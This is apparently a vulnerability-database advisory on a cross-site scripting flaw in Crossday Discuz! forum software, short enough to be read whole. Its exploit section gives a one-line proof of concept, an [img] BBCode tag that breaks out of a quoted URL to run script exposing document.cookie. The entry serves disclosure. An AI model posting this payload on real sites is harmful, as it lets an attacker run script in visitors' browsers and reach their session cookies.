• info
• discussion
• exploit
• solution
• references

Crossday Discuz! Cross Site Scripting Vulnerability

There is no exploit required to leverage this issue. The following proof of concept has been provided:

Include the following text within a message:

[img]http://a.gif');alert(document.cookie);a=escape=('a[/img]